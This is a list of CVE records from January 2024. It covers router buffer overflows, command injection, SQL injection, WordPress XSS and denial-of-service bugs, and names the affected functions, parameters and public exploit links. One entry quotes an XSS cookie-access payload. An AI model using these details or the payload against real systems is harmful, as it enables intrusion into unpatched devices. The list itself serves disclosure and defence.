CVE    2024    935    Candidate    Insertion of Sensitive Information into Log File vulnerabilities affect DELMIA Apriso Release 2019 through Release 2024.    MISC:https://www.3ds.com/vulnerability/advisories   |   URL:https://www.3ds.com/vulnerability/advisories    Assigned (20240126)
CVE    2024    933    Candidate    A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file \app\model\Upload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://docs.qq.com/doc/DYnNWeHdTVXZqZURH   |   URL:https://docs.qq.com/doc/DYnNWeHdTVXZqZURH   |   MISC:https://vuldb.com/?ctiid.252140   |   URL:https://vuldb.com/?ctiid.252140   |   MISC:https://vuldb.com/?id.252140   |   URL:https://vuldb.com/?id.252140    Assigned (20240126)
CVE    2024    932    Candidate    A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This issue affects the function setSmartPowerManagement. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md   |   MISC:https://vuldb.com/?ctiid.252137   |   URL:https://vuldb.com/?ctiid.252137   |   MISC:https://vuldb.com/?id.252137   |   URL:https://vuldb.com/?id.252137    Assigned (20240126)
CVE    2024    931    Candidate    A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md   |   MISC:https://vuldb.com/?ctiid.252136   |   URL:https://vuldb.com/?ctiid.252136   |   MISC:https://vuldb.com/?id.252136   |   URL:https://vuldb.com/?id.252136    Assigned (20240126)
CVE    2024    930    Candidate    A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md   |   MISC:https://vuldb.com/?ctiid.252135   |   URL:https://vuldb.com/?ctiid.252135   |   MISC:https://vuldb.com/?id.252135   |   URL:https://vuldb.com/?id.252135    Assigned (20240126)
CVE    2024    929    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been rated as critical. Affected by this issue is the function fromNatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md   |   MISC:https://vuldb.com/?ctiid.252134   |   URL:https://vuldb.com/?ctiid.252134   |   MISC:https://vuldb.com/?id.252134   |   URL:https://vuldb.com/?id.252134    Assigned (20240126)
CVE    2024    928    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md   |   MISC:https://vuldb.com/?ctiid.252133   |   URL:https://vuldb.com/?ctiid.252133   |   MISC:https://vuldb.com/?id.252133   |   URL:https://vuldb.com/?id.252133    Assigned (20240126)
CVE    2024    927    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been classified as critical. Affected is the function fromAddressNat. The manipulation of the argument entrys/mitInterface/page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md   |   MISC:https://vuldb.com/?ctiid.252132   |   URL:https://vuldb.com/?ctiid.252132   |   MISC:https://vuldb.com/?id.252132   |   URL:https://vuldb.com/?id.252132    Assigned (20240126)
CVE    2024    926    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md   |   MISC:https://vuldb.com/?ctiid.252131   |   URL:https://vuldb.com/?ctiid.252131   |   MISC:https://vuldb.com/?id.252131   |   URL:https://vuldb.com/?id.252131    Assigned (20240126)
CVE    2024    925    Candidate    A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md   |   MISC:https://vuldb.com/?ctiid.252130   |   URL:https://vuldb.com/?ctiid.252130   |   MISC:https://vuldb.com/?id.252130   |   URL:https://vuldb.com/?id.252130    Assigned (20240126)
CVE    2024    924    Candidate    A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md   |   MISC:https://vuldb.com/?ctiid.252129   |   URL:https://vuldb.com/?ctiid.252129   |   MISC:https://vuldb.com/?id.252129   |   URL:https://vuldb.com/?id.252129    Assigned (20240126)
CVE    2024    923    Candidate    A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this issue is the function formSetDeviceName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md   |   MISC:https://vuldb.com/?ctiid.252128   |   URL:https://vuldb.com/?ctiid.252128   |   MISC:https://vuldb.com/?id.252128   |   URL:https://vuldb.com/?id.252128    Assigned (20240126)
CVE    2024    922    Candidate    A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this vulnerability is the function formQuickIndex. The manipulation of the argument PPPOEPassword leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md   |   URL:https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formQuickIndex.md   |   MISC:https://vuldb.com/?ctiid.252127   |   URL:https://vuldb.com/?ctiid.252127   |   MISC:https://vuldb.com/?id.252127   |   URL:https://vuldb.com/?id.252127    Assigned (20240126)
CVE    2024    921    Candidate    A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139.    MISC:https://github.com/xiyuanhuaigu/cve/blob/main/rce.md   |   URL:https://github.com/xiyuanhuaigu/cve/blob/main/rce.md   |   MISC:https://vuldb.com/?ctiid.252139   |   URL:https://vuldb.com/?ctiid.252139   |   MISC:https://vuldb.com/?id.252139   |   URL:https://vuldb.com/?id.252139    Assigned (20240126)
CVE    2024    920    Candidate    A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.252124   |   URL:https://vuldb.com/?ctiid.252124   |   MISC:https://vuldb.com/?id.252124   |   URL:https://vuldb.com/?id.252124   |   MISC:https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4   |   URL:https://warp-desk-89d.notion.site/TEW-822DRE-5289eb95796749c2878843519ab451d8?pvs=4    Assigned (20240126)
CVE    2024    919    Candidate    A vulnerability was found in TRENDnet TEW-815DAP 1.0.2.0. It has been classified as critical. This affects the function do_setNTP of the component POST Request Handler. The manipulation of the argument NtpDstStart/NtpDstEnd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252123. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.252123   |   URL:https://vuldb.com/?ctiid.252123   |   MISC:https://vuldb.com/?id.252123   |   URL:https://vuldb.com/?id.252123   |   MISC:https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4   |   URL:https://warp-desk-89d.notion.site/TEW-815DAP-94a631c20dee4f399268dbcc880f1f4c?pvs=4    Assigned (20240126)
CVE    2024    918    Candidate    A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.252122   |   URL:https://vuldb.com/?ctiid.252122   |   MISC:https://vuldb.com/?id.252122   |   URL:https://vuldb.com/?id.252122   |   MISC:https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4   |   URL:https://warp-desk-89d.notion.site/TEW-800MB-1f9576ce12234b72b08b9c7f4c7d32a6?pvs=4    Assigned (20240126)
CVE    2024    917    Candidate    remote code execution in paddlepaddle/paddle 2.6.0    MISC:https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119   |   URL:https://huntr.com/bounties/2d840735-e255-4700-9709-6f7361829119    Assigned (20240126)
CVE    2024    914    Candidate    A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.    MISC:RHBZ#2260407   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2260407   |   MISC:RHSA-2024:1239   |   URL:https://access.redhat.com/errata/RHSA-2024:1239   |   MISC:RHSA-2024:1411   |   URL:https://access.redhat.com/errata/RHSA-2024:1411   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0914   |   URL:https://access.redhat.com/security/cve/CVE-2024-0914   |   MISC:https://people.redhat.com/~hkario/marvin/   |   URL:https://people.redhat.com/~hkario/marvin/    Assigned (20240125)
CVE    2024    911    Candidate    A flaw was found in indent, a program for formatting C code. This issue may allow an attacker to trick a user into processing a specially crafted file to trigger a heap-based buffer overflow, causing the application to crash.    MISC:RHBZ#2260399   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2260399   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0911   |   URL:https://access.redhat.com/security/cve/CVE-2024-0911   |   MISC:https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html   |   URL:https://lists.gnu.org/archive/html/bug-indent/2024-01/msg00000.html    Assigned (20240125)
CVE    2024    909    Candidate    The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts/pages that protections are being placed on. This makes it possible for unauthenticated attackers to access protected content.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve    Assigned (20240125)
CVE    2024    907    Candidate    The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the restore_records() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to restore records.    MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502   |   MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524   |   URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve    Assigned (20240125)
CVE    2024    906    Candidate    The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API. This makes it possible for unauthenticated attackers to obtain page and post contents of a site protected with this plugin.    MISC:https://wordpress.org/plugins/fx-private-site/   |   URL:https://wordpress.org/plugins/fx-private-site/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve    Assigned (20240125)
CVE    2024    903    Candidate    The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in the feedback submission page that will execute when a user clicks the link, while also pressing the command key.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve    Assigned (20240125)
CVE    2024    901    Candidate    Remotely executed SEGV and out of bounds read allows malicious packet sender to crash or cause an out of bounds read via sending a malformed packet with the correct length.    MISC:https://github.com/wolfSSL/wolfssl/issues/7089   |   URL:https://github.com/wolfSSL/wolfssl/issues/7089   |   MISC:https://github.com/wolfSSL/wolfssl/pull/7099   |   URL:https://github.com/wolfSSL/wolfssl/pull/7099    Assigned (20240125)
CVE    2024    898    Candidate    The Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://wordpress.org/plugins/chat-bubble/   |   URL:https://wordpress.org/plugins/chat-bubble/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve    Assigned (20240125)
CVE    2024    897    Candidate    The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve    Assigned (20240125)
CVE    2024    896    Candidate    The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13   |   URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve    Assigned (20240125)
CVE    2024    895    Candidate    The PDF Flipbook, 3D Flipbook – DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483   |   URL:https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve    Assigned (20240125)
CVE    2024    891    Candidate    A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input <script>alert(document.cookie)</script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The associated identifier of this vulnerability is VDB-252043.    MISC:https://github.com/biantaibao/octopus_XSS/blob/main/report.md   |   URL:https://github.com/biantaibao/octopus_XSS/blob/main/report.md   |   MISC:https://vuldb.com/?ctiid.252043   |   URL:https://vuldb.com/?ctiid.252043   |   MISC:https://vuldb.com/?id.252043   |   URL:https://vuldb.com/?id.252043    Assigned (20240125)
CVE    2024    890    Candidate    A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability.    MISC:https://github.com/biantaibao/octopus_SQL2/blob/main/report.md   |   URL:https://github.com/biantaibao/octopus_SQL2/blob/main/report.md   |   MISC:https://vuldb.com/?ctiid.252042   |   URL:https://vuldb.com/?ctiid.252042   |   MISC:https://vuldb.com/?id.252042   |   URL:https://vuldb.com/?id.252042    Assigned (20240125)
CVE    2024    889    Candidate    A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability.    MISC:https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.252041   |   URL:https://vuldb.com/?ctiid.252041   |   MISC:https://vuldb.com/?id.252041   |   URL:https://vuldb.com/?id.252041    Assigned (20240125)
CVE    2024    888    Candidate    A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039.    MISC:https://fitoxs.com/vuldb/27-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/27-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252039   |   URL:https://vuldb.com/?ctiid.252039   |   MISC:https://vuldb.com/?id.252039   |   URL:https://vuldb.com/?id.252039    Assigned (20240125)
CVE    2024    887    Candidate    A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability.    MISC:https://fitoxs.com/vuldb/18-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/18-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252038   |   URL:https://vuldb.com/?ctiid.252038   |   MISC:https://vuldb.com/?id.252038   |   URL:https://vuldb.com/?id.252038    Assigned (20240125)
CVE    2024    886    Candidate    A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability.    MISC:https://fitoxs.com/vuldb/09-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/09-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252037   |   URL:https://vuldb.com/?ctiid.252037   |   MISC:https://vuldb.com/?id.252037   |   URL:https://vuldb.com/?id.252037    Assigned (20240125)
CVE    2024    885    Candidate    A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036.    MISC:https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.252036   |   URL:https://vuldb.com/?ctiid.252036   |   MISC:https://vuldb.com/?id.252036   |   URL:https://vuldb.com/?id.252036    Assigned (20240125)
CVE    2024    884    Candidate    A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function exec of the file payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252035.    MISC:https://blog.csdn.net/Q_M_0_9/article/details/135846415   |   URL:https://blog.csdn.net/Q_M_0_9/article/details/135846415   |   MISC:https://vuldb.com/?ctiid.252035   |   URL:https://vuldb.com/?ctiid.252035   |   MISC:https://vuldb.com/?id.252035   |   URL:https://vuldb.com/?id.252035    Assigned (20240125)
CVE    2024    883    Candidate    A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects the function prepare of the file admin/pay.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252034 is the identifier assigned to this vulnerability.    MISC:https://blog.csdn.net/weixin_56393356/article/details/135756616   |   URL:https://blog.csdn.net/weixin_56393356/article/details/135756616   |   MISC:https://vuldb.com/?ctiid.252034   |   URL:https://vuldb.com/?ctiid.252034   |   MISC:https://vuldb.com/?id.252034   |   URL:https://vuldb.com/?id.252034    Assigned (20240125)
